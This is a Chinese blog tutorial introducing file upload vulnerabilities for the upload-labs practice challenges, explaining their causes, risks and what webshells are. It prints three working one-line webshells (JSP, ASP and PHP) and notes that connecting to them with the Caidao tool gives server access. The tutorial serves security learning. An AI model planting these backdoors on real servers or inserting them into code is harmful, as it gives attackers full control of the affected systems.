当前位置:   article > 正文

上传漏洞学习——upload-labs 闯关(一)_upload闯关

upload闯关

一、漏洞介绍:

1、什么是文件上传漏洞:

Web应用通常会有文件上传的功能,例如在 BBS 发布图片,在个人网站发布 zip 压缩包,在办公平台发布 DOC 文件等,只要 Web 应用程序允许上传文件,就有可能存在文件上传漏洞。

2、什么样的网站会有文件上传漏洞:

大部分文件上传漏洞的产生是因为 Web 应用程序没有对上传文件的格式进行严格过滤,还有一部分是攻击者通过 Web 服务器的解析漏洞来突破 Web 应用程序的防护,后面我们会讲到一些常见的解析漏洞,最后还有一些不常见的其他漏洞,如 IIS PUT漏洞等 。

3、文件上传漏洞的危害:

文件上传漏洞与 “SQL注入” 或 “XSS” 相比其风险更大,如果 Web 应用程序存在上传漏洞,攻击者甚至可以直接上传一个 webshell 到服务器上,就可以获得这个服务器的所有权限。

4、webshell介绍:

webshell 是以 asp、php、jsp 等网页文件形式存在的一种命令执行环境,也称其为一种网页后门。一般说来,当 Hacker 入侵一个网站后,会把这些 asp、php 木马的后门文件放在该网站的 Web 目录中,和正常的网页文件混杂,其命名可能和正常的文件命名很类似,让人无法第一眼通过文件名判断其为后门文件。然后就可以利用 Web 请求的方式,用 asp 或者 php 木马后门控制网站服务器,包括上传下载文件、查看数据库、执行任意程序命令等一系列操作。

4.1、webshell的分类:
  1. 根据文件大小分类:大马和小马(通常指的是一句话木马,能够使用菜刀这类工具去直接连接它)

  2. 根据脚本名称分类:jsp、asp、aspx、php

4.2、几种经典的webshell:

1、jsp的简单的webshell:

<%Runtime.getRuntime().exec(request.getParameter("i"));%>
  • 1

2、asp的简单的webshell:

<%eval request("cmd")%>
  • 1

3、php的简单的webshell:

php经典一句话:

<?php @eval($_POST['自定义密码']);?>
  • 1

然后连接菜刀就能直接进服务器了。

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/小丑西瓜9/article/detail/384853
推荐阅读